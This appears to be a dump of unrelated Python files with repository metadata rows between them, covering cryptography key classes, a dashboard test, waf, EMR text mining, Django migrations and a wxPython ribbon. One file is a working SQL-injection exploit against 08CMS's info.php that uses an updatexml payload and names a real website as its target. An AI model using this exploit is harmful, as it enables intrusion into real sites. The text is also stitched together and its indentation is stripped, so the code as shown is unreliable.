@utils.register_interface(X25519PublicKey)
class _X25519PublicKey(object):
def __init__(self, backend, evp_pkey):
self._backend = backend
self._evp_pkey = evp_pkey
def public_bytes(self, encoding=None, format=None):
if encoding is None or format is None:
if encoding is not None or format is not None:
raise ValueError("Both encoding and format are required")
else:
warnings.warn(
"public_bytes now requires encoding and format arguments. "
"Support for calling without arguments will be removed in "
"cryptography 2.7",
utils.DeprecatedIn25,
)
encoding = serialization.Encoding.Raw
format = serialization.PublicFormat.Raw
if (
encoding is serialization.Encoding.Raw or
format is serialization.PublicFormat.Raw
):
if (
encoding is not serialization.Encoding.Raw or
format is not serialization.PublicFormat.Raw
):
raise ValueError(
"When using Raw both encoding and format must be Raw"
)
return self._raw_public_bytes()
if (
encoding in serialization._PEM_DER and
format is not serialization.PublicFormat.SubjectPublicKeyInfo
):
raise ValueError(
"format must be SubjectPublicKeyInfo when encoding is PEM or "
"DER"
)
return self._backend._public_key_bytes(
encoding, format, self, self._evp_pkey, None
)
def _raw_public_bytes(self):
ucharpp = self._backend._ffi.new("unsigned char **")
res = self._backend._lib.EVP_PKEY_get1_tls_encodedpoint(
self._evp_pkey, ucharpp
)
self._backend.openssl_assert(res == 32)
self._backend.openssl_assert(ucharpp[0] != self._backend._ffi.NULL)
data = self._backend._ffi.gc(
ucharpp[0], self._backend._lib.OPENSSL_free
)
return self._backend._ffi.buffer(data, res)[:]
@utils.register_interface(X25519PrivateKey)
class _X25519PrivateKey(object):
def __init__(self, backend, evp_pkey):
self._backend = backend
self._evp_pkey = evp_pkey
def public_key(self):
bio = self._backend._create_mem_bio_gc()
res = self._backend._lib.i2d_PUBKEY_bio(bio, self._evp_pkey)
self._backend.openssl_assert(res == 1)
evp_pkey = self._backend._lib.d2i_PUBKEY_bio(
bio, self._backend._ffi.NULL
)
self._backend.openssl_assert(evp_pkey != self._backend._ffi.NULL)
evp_pkey = self._backend._ffi.gc(
evp_pkey, self._backend._lib.EVP_PKEY_free
)
return _X25519PublicKey(self._backend, evp_pkey)
def exchange(self, peer_public_key):
if not isinstance(peer_public_key, X25519PublicKey):
raise TypeError("peer_public_key must be X25519PublicKey.")
return _evp_pkey_derive(
self._backend, self._evp_pkey, peer_public_key
)
def private_bytes(self, encoding, format, encryption_algorithm):
if (
encoding is serialization.Encoding.Raw or
format is serialization.PublicFormat.Raw
):
if (
format is not serialization.PrivateFormat.Raw or
encoding is not serialization.Encoding.Raw or not
isinstance(encryption_algorithm, serialization.NoEncryption)
):
raise ValueError(
"When using Raw both encoding and format must be Raw "
"and encryption_algorithm must be NoEncryption()"
)
return self._raw_private_bytes()
if (
encoding in serialization._PEM_DER and
format is not serialization.PrivateFormat.PKCS8
):
raise ValueError(
"format must be PKCS8 when encoding is PEM or DER"
)
return self._backend._private_key_bytes(
encoding, format, encryption_algorithm, self._evp_pkey, None
)
def _raw_private_bytes(self):
# When we drop support for CRYPTOGRAPHY_OPENSSL_LESS_THAN_111 we can
# switch this to EVP_PKEY_new_raw_private_key
# The trick we use here is serializing to a PKCS8 key and just
# using the last 32 bytes, which is the key itself.
bio = self._backend._create_mem_bio_gc()
res = self._backend._lib.i2d_PKCS8PrivateKey_bio(
bio, self._evp_pkey,
self._backend._ffi.NULL, self._backend._ffi.NULL,
0, self._backend._ffi.NULL, self._backend._ffi.NULL
)
self._backend.openssl_assert(res == 1)
pkcs8 = self._backend._read_mem_bio(bio)
self._backend.openssl_assert(len(pkcs8) == 48)
return pkcs8[-_X25519_KEY_SIZE:]
| [
"[email protected]"
] | |
0c53c8c3135c11ac44c7ed5ad9f0094da5ce9c6a | 839b26d2d837f256423c11908a2a3618ab8a23f3 | /dashboard/dashboard/update_bug_with_results_test.py | 7b4282e95a1380e535001797e6710cb237eb8f78 | [
"BSD-3-Clause"
] | permissive | Mdlglobal-atlassian-net/catapult | 79be5d4ec5d681c1d2f37ae83534a02f4a4ec72a | e9a386951413e7cbf983abf968626b2e5097fc38 | refs/heads/master | 2022-02-27T15:18:45.524790 | 2020-06-01T07:12:27 | 2020-06-01T22:57:01 | 268,672,431 | 0 | 1 | BSD-3-Clause | 2020-06-02T01:31:05 | 2020-06-02T01:31:04 | null | UTF-8 | Python | false | false | 2,403 | py | # Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import unittest
import mock
from dashboard import update_bug_with_results
from dashboard.common import namespaced_stored_object
from dashboard.common import testing_common
from dashboard.common import utils
from dashboard.models import anomaly
# In this class, we patch apiclient.discovery.build so as to not make network
# requests, which are normally made when the IssueTrackerService is initialized.
@mock.patch('apiclient.discovery.build', mock.MagicMock())
@mock.patch.object(utils, 'ServiceAccountHttp', mock.MagicMock())
@mock.patch.object(utils, 'TickMonitoringCustomMetric', mock.MagicMock())
class UpdateBugWithResultsTest(testing_common.TestCase):
def setUp(self):
super(UpdateBugWithResultsTest, self).setUp()
self.SetCurrentUser('[email protected]', is_admin=True)
namespaced_stored_object.Set('repositories', {
'chromium': {
'repository_url': 'https://chromium.googlesource.com/chromium/src'
},
})
def testMapAnomaliesToMergeIntoBug(self):
# Add anomalies.
test_keys = list(
map(utils.TestKey, [
'ChromiumGPU/linux-release/scrolling-benchmark/first_paint',
'ChromiumGPU/linux-release/scrolling-benchmark/mean_frame_time'
]))
anomaly.Anomaly(
start_revision=9990,
end_revision=9997,
test=test_keys[0],
median_before_anomaly=100,
median_after_anomaly=200,
bug_id=12345).put()
anomaly.Anomaly(
start_revision=9990,
end_revision=9996,
test=test_keys[0],
median_before_anomaly=100,
median_after_anomaly=200,
bug_id=54321).put()
# Map anomalies to base(dest_bug_id) bug.
update_bug_with_results._MapAnomaliesToMergeIntoBug(
dest_issue=update_bug_with_results.IssueInfo('chromium', 12345),
source_issue=update_bug_with_results.IssueInfo('chromium', 54321))
anomalies = anomaly.Anomaly.query(
anomaly.Anomaly.bug_id == int(54321),
anomaly.Anomaly.project_id == 'chromium').fetch()
self.assertEqual(0, len(anomalies))
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
96aa347b5f76f2db0199a18000c0f91940d0bcf7 | 7ec04fc867d0a48fffc05c65bff9217cfe211fe7 | /HW/myTest1.py | 9aeb7c4359629e0d3d917b41f10bd9d23c29e166 | [] | no_license | Cherry93/pythonPractic | 3b9d1f99803503073bbb2f3a58009665338bd278 | 2889183af6c9a01ab47895b23e2d6ce8c288fd4d | refs/heads/master | 2021-08-31T16:41:56.655989 | 2017-12-22T03:53:18 | 2017-12-22T03:53:18 | 115,008,198 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 91 | py | import mytool.supperTurtules
print(mytool.supperTurtules.drawLine(-50,-50,50,50,10,"red")) | [
"[email protected]"
] | |
71fa0ac2a1bc628676d9568ea30eb2a2900822aa | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02951/s416256902.py | e351c2216c8cf5ccf323b15b115c1f535f573c84 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 85 | py | a,b,c=map(int,input().split())
if c-(a-b)>0:
print(c-(a-b))
else:
print("0")
| [
"[email protected]"
] | |
8f926e08fc1dc61bbc483c5c73e906cf776d5658 | 6930a434c0506d44bf8a8e81cb86e95c219c3a77 | /python/day19/code/bool.py | dbd9efd62a9608472ca8da6ae9bf5321b9911546 | [] | no_license | Conquerk/test | ed15d5603538340559556c9e0f20cc61ad3e4486 | 7ff42c99b8a2132c6dd1c73315ff95cfef63a8f6 | refs/heads/master | 2020-04-19T01:47:28.322929 | 2019-01-28T01:52:00 | 2019-01-28T01:52:00 | 167,882,236 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | py | class a:
# def __bool__(self):
# print("bool方法被调用")
# return False
def __len__(self):
print('len被调用')
return 5
x=a()
print(bool(x))
if x :
print("x 为真值")
else:
print("x 为假值") | [
"[email protected]"
] | |
4a66f501d21dc0e21b25cd557749a229c108d7bf | f85ce2baf753d65e8666bbda062acbdb0ccdb5ad | /leetcode/venv/lib/python2.7/site-packages/pyutil/common/multi_proxy.py | 4464833378477d0125b57f50987802b986064008 | [] | no_license | KqSMea8/PycharmProjects | 2a9d3fa59d08c77daf63be427da27695d4dea471 | c592d879fd79da4e0816a4f909e5725e385b6160 | refs/heads/master | 2020-04-14T11:54:56.435247 | 2019-01-02T10:15:36 | 2019-01-02T10:15:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 647 | py | # coding=utf-8
__author__ = 'qiukun'
class MultiProxy():
"""
typical usage:
p = MultiProxy([a, b])
对 p 的方法调用会应用到 a, b,返回 b(最后一个对象)对应方法的返回值
e.g.
buf = p.r()
p.write()
"""
def __init__(self, objs):
"""
:param objs: a iterator of objs to be proxyed.
:return: the proxy
"""
self.objs = objs
def __getattr__(self, item):
def wrapper(*args, **kwargs):
rt = None
for o in self.objs:
rt = getattr(o, item)(*args, **kwargs)
return rt
return wrapper | [
"[email protected]"
] | |
ebca6a39db8c0a22574b611a0271ac7bc9a10d1d | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02791/s398923350.py | 525b6e69293b56cf550f10a02c0494389a8a6380 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 351 | py | import sys
readline = sys.stdin.readline
MOD = 10 ** 9 + 7
INF = float('INF')
sys.setrecursionlimit(10 ** 5)
def main():
N = int(readline())
P = list(map(int, readline().split()))
cur = N + 1
ans = 0
for x in P:
if cur > x:
ans += 1
cur = x
print(ans)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
ccccc364d5e5480a14cd01e9facbb6cb9445987c | 3e24611b7315b5ad588b2128570f1341b9c968e8 | /pacbiolib/pacbio/pythonpkgs/pbtranscript/lib/python2.7/site-packages/pbtranscript/ice/make_input_fasta_fofn.py | 77356562bf1686d47a5b7653eb24734ce3d41869 | [
"BSD-2-Clause"
] | permissive | bioCKO/lpp_Script | dc327be88c7d12243e25557f7da68d963917aa90 | 0cb2eedb48d4afa25abc2ed7231eb1fdd9baecc2 | refs/heads/master | 2022-02-27T12:35:05.979231 | 2019-08-27T05:56:33 | 2019-08-27T05:56:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,072 | py | #! python
"""Given input.fofn, for each movie.bas|bax.h5 file in the fofn,
call pls2fasta to generate a movie.bax|bas.h5.fasta file in a
specified directory, and then trim both ends of each read in fasta
files. Finally, add all these fasta files to fasta_fofn
(e.g., input.fasta.fofn).
"""
import logging
import sys
import os.path as op
from pbtranscript.__init__ import get_version
from pbtranscript.ice.IceUtils import convert_fofn_to_fasta
def set_parser(parser):
"""Get arguments."""
parser.add_argument("input_fofn",
help="Input bax.h5 fofn, e.g., input.fofn")
parser.add_argument("fasta_fofn",
help="Output fasta fofn, e.g., input.fasta.fofn")
parser.add_argument("fasta_out_dir",
help="Where to save generated fasta files")
from pbcore.util.ToolRunner import PBToolRunner
class MakeFastaFofnRunner(PBToolRunner):
"""ice_make_input_fasta_fofn runner."""
def __init__(self):
desc = "Converting bas/bax.h5 files within a fofn to fasta " + \
"files and create a fasta fofn."
PBToolRunner.__init__(self, desc)
set_parser(self.parser)
def getVersion(self):
"""Return version string."""
return get_version()
def run(self):
"""Run"""
logging.info("Running {f} v{v}.".format(f=op.basename(__file__),
v=get_version()))
args = self.args
try:
convert_fofn_to_fasta(fofn_filename=args.input_fofn,
out_filename=args.fasta_fofn,
fasta_out_dir=args.fasta_out_dir,
force_overwrite=False)
except:
logging.exception("Failed to convert fofn {f} to fasta.".
format(f=args.input_fofn))
return 1
return 0
def main():
"""Main function."""
runner = MakeFastaFofnRunner()
return runner.start()
if __name__ == "__main__":
sys.exit(main())
| [
"[email protected]"
] | |
99b4337e7934e957fe1496cda64778117b102922 | bc2a85e8dd9244f89e2f1801cc19d570a87c74ed | /Leetcode/Algorithms/Easy/Arrays/MeetingTime.py | 4e389ed460c2d8ac9a19f0e4c01beffd544cb5ce | [] | no_license | christian-miljkovic/interview | 1cab113dbe0096e860a3ae1d402901a15e808e32 | 63baa1535b788bc3e924f3c24a799bade6a2eae3 | refs/heads/master | 2023-01-11T14:53:09.304307 | 2020-02-04T17:35:12 | 2020-02-04T17:35:12 | 193,549,798 | 0 | 0 | null | 2023-01-05T05:56:15 | 2019-06-24T17:28:50 | Python | UTF-8 | Python | false | false | 1,944 | py | """
Time Planner
Implement a function meetingPlanner that given the availability, slotsA and slotsB, of two people and a meeting duration dur, returns the earliest time slot that works for both of them and is of duration dur. If there is no common time slot that satisfies the duration requirement, return an empty array.
Time is given in a Unix format called Epoch, which is a nonnegative integer holding the number of seconds that have elapsed since 00:00:00 UTC, Thursday, 1 January 1970.
Each person’s availability is represented by an array of pairs. Each pair is an epoch array of size two. The first epoch in a pair represents the start time of a slot. The second epoch is the end time of that slot. The input variable dur is a positive integer that represents the duration of a meeting in seconds. The output is also a pair represented by an epoch array of size two.
In your implementation assume that the time slots in a person’s availability are disjointed, i.e, time slots in a person’s availability don’t overlap. Further assume that the slots are sorted by slots’ start time.
Implement an efficient solution and analyze its time and space complexities.
Examples:
input: slotsA = [[10, 50], [60, 120], [140, 210]]
slotsB = [[0, 15], [60, 70]]
dur = 8
output: [60, 68]
input: slotsA = [[10, 50], [60, 120], [140, 210]]
slotsB = [[0, 15], [60, 70]]
dur = 12
output: [] # since there is no common slot whose duration is 12
"""
def meeting_planner(slotsA, slotsB, dur):
result = []
for i in range(0,len(slotsA)):
startA = slotsA[i][0]
endA = slotsA[i][1]
for j in range(0,len(slotsB)):
startB = slotsB[j][0]
endB = slotsB[j][1]
min_time = min(endA, endB)
max_time = max(startA, startB)
bound = min_time - max_time
if bound >= dur:
result.append(max_time)
result.append(max_time+dur)
return result | [
"[email protected]"
] | |
116c8f86cfaa52e4e72d3024334d871d5eb5ebab | 8311a0bcf3f2126d622f928483ce2ea9d6a7cb0d | /Code/Matthew/django/mysite/polls/migrations/0001_initial.py | 967a82248a77534828deedc67a2aec779b4c3227 | [] | no_license | guam68/class_iguana | 857247dca0ff732d11f7fb0d3dc761ec83846c94 | e4359d32dfe60423a643c21df5636669016ad2c0 | refs/heads/master | 2020-05-01T06:33:22.611127 | 2019-03-13T23:07:41 | 2019-03-13T23:07:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,165 | py | # Generated by Django 2.1.5 on 2019-02-07 18:41
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Choice',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('choice_text', models.CharField(max_length=200)),
('votes', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question_text', models.CharField(max_length=200)),
('pub_date', models.DateTimeField(verbose_name='date published')),
],
),
migrations.AddField(
model_name='choice',
name='question',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='polls.Question'),
),
]
| [
"[email protected]"
] | |
aa59fe19a4acba2c251b00e81b73e30f348144c8 | 9e20f7e71faa2853516f88ee7672e1323d12e8f7 | /seq_lda/algorithms/__init__.py | d3ed380d3428aab45ed45e014fe016bca4131374 | [] | no_license | e2crawfo/seq_lda | 3270a07781369d318c0cf2e75cdbfee96423c52d | ebe3caea127575f6e54884bf0d32ac6d4a876d4e | refs/heads/master | 2020-09-17T18:55:19.562861 | 2017-03-28T16:10:52 | 2017-03-28T16:10:52 | 67,877,820 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 145 | py | from .markov_lda import generate_markov_chains
from .lda import LDA
from .mssg import MSSG, SingleMSSG
from .baseline import OneByOne, Aggregate
| [
"[email protected]"
] | |
be6ac3323527ef02eb9d8a966231f7f830aaed04 | 43ff15a7989576712d0e51f0ed32e3a4510273c0 | /tools/pocs/bugscan/exp_885.py | 701317e53735eabbc5a8dcc364e6082aba740f46 | [] | no_license | v1cker/kekescan | f2b51d91a9d6496e2cdc767eb6a600171f513449 | 3daa1775648439ba9e0003a376f90b601820290e | refs/heads/master | 2020-09-19T16:26:56.522453 | 2017-06-15T02:55:24 | 2017-06-15T02:55:24 | 94,495,007 | 6 | 3 | null | null | null | null | UTF-8 | Python | false | false | 874 | py | # -*- coding: utf-8 -*-
from dummy import *
from miniCurl import Curl
curl = Curl()
#/usr/bin/python
#-*- coding: utf-8 -*-
#Refer http://www.wooyun.org/bugs/wooyun-2015-0110861
#__Author__ = 上善若水
#_PlugName_ = 08CMS_sql Plugin
#_FileName_ = 08CMS_sql.py
def assign(service, arg):
if service == "08cms":
return True, arg
def audit(arg):
url = arg + "info.php?fid=1&tblprefix=cms_msession"
payload = "/**/where/**/1/**/and/**/updatexml(1,concat(0x37,(select/**/md5(520)/**/limit/**/0,1)),1)%23"
geturl = url + payload
code, head, body, errcode, final_url = curl.curl2(geturl,cookie="umW_msid=rsLQWU")
if code == 200 and 'cf67355a3333e6e143439161adc2d82e' in body:
security_hole(url)
if __name__ == '__main__':
from dummy import *
audit(assign('08cms', 'http://www.pxmfw.com/')[1])
| [
"[email protected]"
] | |
c0c2166d1a614fb9c14325a21fda4c3df736ef1f | 3b9338d99cf8090387418e32ca81617f072c39fb | /waflib/extras/dumbpreproc.py | bc4b2d04061ab96a7da92066adb4f81e8c95e0e8 | [] | no_license | sillsdevarchive/wsiwaf | 8ca14c286bafceb9ee6fad740b64ad7131282dc3 | 2dcddafc3602a7220acbe995df4ba85abb06b767 | refs/heads/master | 2020-12-30T17:10:21.701380 | 2017-05-12T05:12:17 | 2017-05-12T05:12:17 | 91,052,898 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,490 | py | #!/usr/bin/env python
# encoding: utf-8
# Thomas Nagy, 2006-2010 (ita)
"""
Dumb C/C++ preprocessor for finding dependencies
It will look at all include files it can find after removing the comments, so the following
will always add the dependency on both "a.h" and "b.h"::
#include "a.h"
#ifdef B
#include "b.h"
#endif
int main() {
return 0;
}
To use::
def configure(conf):
conf.load('compiler_c')
conf.load('c_dumbpreproc')
"""
import re, sys, os, string, traceback
from waflib import Logs, Build, Utils, Errors
from waflib.Logs import debug, error
from waflib.Tools import c_preproc
re_inc = re.compile(
'^[ \t]*(#|%:)[ \t]*(include)[ \t]*[<"](.*)[>"]\r*$',
re.IGNORECASE | re.MULTILINE)
def lines_includes(node):
code = node.read()
if c_preproc.use_trigraphs:
for (a, b) in c_preproc.trig_def: code = code.split(a).join(b)
code = c_preproc.re_nl.sub('', code)
code = c_preproc.re_cpp.sub(c_preproc.repl, code)
return [(m.group(2), m.group(3)) for m in re.finditer(re_inc, code)]
# Keep a reference to the real preprocessor-based parser so we can subclass it.
parser = c_preproc.c_parser

class dumb_parser(parser):
    """Dependency scanner that records every #include it sees, unconditionally.

    Unlike the full ``c_preproc`` parser it performs no macro evaluation, so
    includes inside false ``#ifdef`` branches are still reported (see the
    module docstring).
    """

    def addlines(self, node):
        # Skip files already being processed (guards against include cycles);
        # the last entry is the node currently being added.
        if node in self.nodes[:-1]:
            return
        self.currentnode_stack.append(node.parent)
        # Queue this file's includes ahead of the remaining work, with a
        # POPFILE sentinel marking where its directory scope ends.
        self.lines = lines_includes(node) + [(c_preproc.POPFILE, '')] + self.lines

    def start(self, node, env):
        """Scan *node* and everything it transitively includes."""
        self.addlines(node)
        while self.lines:
            (x, y) = self.lines.pop(0)
            if x == c_preproc.POPFILE:
                # Finished a file: drop its directory from the search stack.
                self.currentnode_stack.pop()
                continue
            # tryfind() resolves the header name and recurses via addlines().
            self.tryfind(y)

# Install the simplified parser in place of the default one.
c_preproc.c_parser = dumb_parser
| [
"tnagy1024@f0382ac9-c320-0410-b3f0-b508d59f5a85"
] | tnagy1024@f0382ac9-c320-0410-b3f0-b508d59f5a85 |
987fa66a52474194186e6d244ee565863549eaf6 | 53dd5d2cfb79edc87f6c606bbfb7d0bedcf6da61 | /.history/EMR/EMRryzd_2_20190507094011.py | d2f51d07e0695ada05beddc4e3e39e063c14d700 | [] | no_license | cyc19950621/python | 4add54894dc81187211aa8d45e5115903b69a182 | d184b83e73334a37d413306d3694e14a19580cb0 | refs/heads/master | 2020-04-11T20:39:34.641303 | 2019-07-02T12:54:49 | 2019-07-02T12:54:49 | 162,078,640 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,283 | py | #-*- coding: UTF-8 -*-
#本文件用于数据清洗
import time
import math
import os
import sys
import os, os.path,shutil
import codecs
import EMRdef
import re
# Collect every EHR admission-diagnosis .txt file under the source directory.
emrtxts = EMRdef.txttq(u'D:\DeepLearning ER\EHRryzd')  # gather .txt files from the directory
# Catalogue of respiratory-disease terms, one term per line.
# NOTE(review): this handle is never closed — consider a `with` block.
hxjb = open(r'D:\python\EMR\hxjbml.txt',errors="ignore")  # respiratory disease catalogue
hxjbdic = hxjb.readlines()  # read one term per line
# One entry per patient file: the diagnosis lines that matched a catalogue term.
ryzd=[]
for emrtxt in emrtxts:
    f = open(emrtxt,'r',errors="ignore")  # errors="ignore" tolerates Chinese encoding issues
    # Bare file name (no directory, no extension) — used by the commented-out export below.
    emrpath = os.path.basename(emrtxt)
    emrpath = os.path.splitext(emrpath)[0]
    line_out = []
    for line in f.readlines():
        line = re.sub('\n','',line)
        # Normalise any "...肺炎" (pneumonia) variant to the plain term.
        line = re.sub(r'(.+?)肺炎','肺炎',line)  # replace all pneumonia variants
        for hxjbc in hxjbdic:  # scan the line for every catalogue term
            hxjbc = re.sub('\n','',hxjbc)
            if line.find(hxjbc) >-1:
                line_out.append(line)
    # NOTE(review): line_output (de-duplicated lines) is computed but unused;
    # the raw line_out list is what gets appended to the transactions below.
    line_output = EMRdef.delre(line_out)
    ryzd.append(line_out)
    #line = '\n'.join(line_output)
    #EMRdef.text_create(r'D:\DeepLearning ER\EHRryzd2','.txt' ,emrpath,line)
import orangecontrib.associate.fpgrowth as oaf
# Mine frequent itemsets over the per-patient diagnosis lists (min support 0.01).
often=dict(oaf.frequent_itemsets(ryzd, .01))  # frequent itemset support counts
print(often)
rules = oaf.association_rules(often, .5)  # association rules at 0.5 confidence
rules = list(rules)
| [
"[email protected]"
] | |
271dad85cc99d1fa818b59459c7c0d3fb1f1bdd0 | 175d6cff12514da71aafef6b9ff48dd56a87db2d | /alveus/ribbon.py | 1c317cfa8a107f005e2676b9980a1ba3186d2250 | [
"MIT"
] | permissive | FrederikLehn/alveus | d309eea98bd36f06709c55a18f0855f38b5420a9 | 71a858d0cdd8a4bbd06a28eb35fa7a8a7bd4814b | refs/heads/main | 2023-06-26T02:29:59.236579 | 2021-07-30T11:07:17 | 2021-07-30T11:07:17 | 391,029,935 | 4 | 3 | null | null | null | null | UTF-8 | Python | false | false | 34,103 | py | # generic imports ------------------------------------------------------------------------------------------------------
import types
# wxPython imports -----------------------------------------------------------------------------------------------------
import wx.lib.agw.ribbon as rb
from wx.lib.agw.gradientbutton import GradientButton
from wx.lib.agw.ribbon.art import RIBBON_BAR_SHOW_PAGE_LABELS, RIBBON_BAR_SHOW_PAGE_ICONS
# Alveus imports -------------------------------------------------------------------------------------------------------
from _ids import *
import _icons as ico
from widgets.customized_menu import CustomMenuItem, CustomMenu
# ----------------------------------------------------------------------------------------------------------------------
class Ribbon(rb.RibbonBar):
    """Main application ribbon: a 'File' pop-up menu plus 'Home' and 'Entities'
    pages, with a customised (re-skinned) MSW art provider."""

    def __init__(self, parent):
        """Build all pages, panels and button bars and apply the custom art.

        :param parent: parent window hosting the ribbon.
        """
        super().__init__(parent=parent, id=wx.ID_ANY, agwStyle=rb.RIBBON_BAR_DEFAULT_STYLE | rb.RIBBON_BAR_SHOW_PANEL_EXT_BUTTONS)

        # File tab------------------------------------------------------------------------------------------------------
        # The 'File' tab is a plain button overlaid on the tab row; clicking it
        # pops up a menu instead of switching pages.
        self.file_page = RibbonFileTab(self)
        self.file_menu = RibbonFileMenu()

        self.file_page.Bind(wx.EVT_BUTTON, self.OnFileTabMenu)

        # Home tab------------------------------------------------------------------------------------------------------
        home = rb.RibbonPage(self, wx.ID_ANY, 'Home')

        window_panel = rb.RibbonPanel(home, wx.ID_ANY, 'Window')
        self.window = rb.RibbonButtonBar(window_panel)
        self.window.AddHybridButton(ID_WINDOW, 'Window', ico.window_32x32.GetBitmap(), 'Add new window')
        self.window.AddSimpleButton(ID_WINDOW_REFRESH, 'Refresh', ico.window_refresh_32x32.GetBitmap(), 'Refresh active window')
        self.window.AddToggleButton(ID_WINDOW_PRESENT, 'Present', ico.window_32x32.GetBitmap(), 'Change to presentation mode')

        generic_chart_panel = rb.RibbonPanel(home, wx.ID_ANY, 'Generic charts')
        self.generic_chart = rb.RibbonButtonBar(generic_chart_panel)
        self.generic_chart.AddSimpleButton(ID_CHART_CARTESIAN, 'Cartesian', ico.cartesian_chart_32x32.GetBitmap(), 'Add new cartesian chart')
        self.generic_chart.AddSimpleButton(ID_CHART_STACKED, 'Stacked', ico.stacked_chart_32x32.GetBitmap(), 'Add new stacked chart')
        self.generic_chart.AddSimpleButton(ID_CHART_BAR, 'Bar', ico.bar_chart_32x32.GetBitmap(), 'Add new bar chart')
        self.generic_chart.AddSimpleButton(ID_CHART_BUBBLE, 'Bubble', ico.bubble_chart_32x32.GetBitmap(), 'Add new bubble chart')
        self.generic_chart.AddSimpleButton(ID_CHART_HISTOGRAM, 'Histogram', ico.histogram_chart_32x32.GetBitmap(), 'Add new histogram')
        self.generic_chart.AddSimpleButton(ID_CHART_MAP, 'Map', ico.map_chart_32x32.GetBitmap(), 'Add new map')
        self.generic_chart.AddSimpleButton(ID_CHART_3D, '3D', ico.threeD_chart_32x32.GetBitmap(), 'Add 3D chart')

        custom_chart_panel = rb.RibbonPanel(home, wx.ID_ANY, 'Custom charts')
        self.custom_chart = rb.RibbonButtonBar(custom_chart_panel)
        self.custom_chart.AddSimpleButton(ID_CHART_FIT, 'Fits', ico.fit_chart_32x32.GetBitmap(), 'Add new fit chart')
        self.custom_chart.AddSimpleButton(ID_CHART_TREND, 'Trends', ico.trend_chart_32x32.GetBitmap(), 'Add new trend chart')
        self.custom_chart.AddSimpleButton(ID_CHART_INCREMENT, 'Increments', ico.increment_chart_32x32.GetBitmap(), 'Add new increment chart')
        self.custom_chart.AddSimpleButton(ID_CHART_PROFILES, 'Profiles', ico.profiles_chart_32x32.GetBitmap(), 'Add new profiles chart')

        export_panel = rb.RibbonPanel(home, wx.ID_ANY, 'Export')
        self.export = rb.RibbonButtonBar(export_panel)
        self.export.AddSimpleButton(ID_EXPORT_EXCEL, 'Export', ico.export_spreadsheet_32x32.GetBitmap(), 'Open profile export frame')

        correlation_panel = rb.RibbonPanel(home, wx.ID_ANY, 'Correlation')
        self.correlation = rb.RibbonButtonBar(correlation_panel)
        self.correlation.AddSimpleButton(ID_CORRELATION_ENT, 'Entity', ico.correlation_entity_32x32.GetBitmap(), 'Open entity correlation frame')
        self.correlation.AddSimpleButton(ID_CORRELATION_VAR, 'Variable', ico.correlation_variable_32x32.GetBitmap(), 'Open variable correlation frame')

        summary_panel = rb.RibbonPanel(home, wx.ID_ANY, 'Summary')
        self.summary = rb.RibbonButtonBar(summary_panel)
        self.summary.AddSimpleButton(ID_SUMMARY, 'Summary', ico.summary_32x32.GetBitmap(), 'Add new summary variable')

        # Entities tab -------------------------------------------------------------------------------------------------
        entities = rb.RibbonPage(self, wx.ID_ANY, 'Entities')

        folder_panel = rb.RibbonPanel(entities, wx.ID_ANY, 'Folders')
        self.folder = rb.RibbonButtonBar(folder_panel)
        self.folder.AddSimpleButton(ID_FOLDER, 'Folder', ico.folder_closed_32x32.GetBitmap(), 'Add new folder')

        portfolio_panel = rb.RibbonPanel(entities, wx.ID_ANY, 'Portfolio')
        self.portfolio = rb.RibbonButtonBar(portfolio_panel)
        self.portfolio.AddSimpleButton(ID_ANALOGUE, 'Analogue', ico.analogue_32x32.GetBitmap(), 'Add new analogue')
        self.portfolio.AddSimpleButton(ID_TYPECURVE, 'Typecurve', ico.trend_chart_32x32.GetBitmap(), 'Add new typecurve')
        self.portfolio.AddSimpleButton(ID_SCALING, 'Scaling', ico.scaling_chart_32x32.GetBitmap(), 'Add new scaling')

        subsurface_panel = rb.RibbonPanel(entities, wx.ID_ANY, 'Subsurface')
        self.subsurface = rb.RibbonButtonBar(subsurface_panel)
        self.subsurface.AddSimpleButton(ID_RESERVOIR, 'Reservoir', ico.reservoir_32x32.GetBitmap(), 'Add new reservoir')
        self.subsurface.AddSimpleButton(ID_THEME, 'Theme', ico.theme_32x32.GetBitmap(), 'Add new theme')
        self.subsurface.AddSimpleButton(ID_POLYGON, 'Polygon', ico.polygon_32x32.GetBitmap(), 'Add new polygon')
        self.subsurface.AddSimpleButton(ID_PRODUCER, 'Producer', ico.producer_oil_gas_32x32.GetBitmap(), 'Add new producer')
        self.subsurface.AddSimpleButton(ID_INJECTOR, 'Injector', ico.injector_wag_32x32.GetBitmap(), 'Add new injector')

        facility_panel = rb.RibbonPanel(entities, wx.ID_ANY, 'Facility')
